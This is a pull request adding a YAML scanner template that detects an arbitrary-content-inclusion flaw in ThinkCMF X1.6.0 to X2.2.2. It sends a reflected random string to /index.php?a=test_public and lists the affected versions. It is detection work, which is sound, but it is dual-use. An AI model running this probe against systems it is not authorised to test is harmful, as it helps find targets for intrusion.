### PR TITLE
Create thinkcmf-lfi.yml

### DIFF
--- a/pocs/thinkcmf-lfi.yml
+++ b/pocs/thinkcmf-lfi.yml
@@ -1,0 +1,12 @@
+name: poc-yaml-thinkcmf-lfi
+set:
+  r1: randomLowercase(32)
+rules:
+  - method: GET
+    path: /index.php?a=test_public&arg1={{r1}}
+    expression: |
+      status == 200 && body.bcontains(bytes(r1))
+detail:
+  author: j4ckzh0u(https://github.com/j4ckzh0u)
+  links:
+    - https://www.freebuf.com/vuls/217586.html


### PR DESCRIPTION

## 本 poc 是检测thinkcmf 的任意内容包含漏洞。
## 影响版本
ThinkCMF X1.6.0

ThinkCMF X2.1.0

ThinkCMF X2.2.0

ThinkCMF X2.2.1

ThinkCMF X2.2.2

## 测试环境
暂无线上环境

## 备注
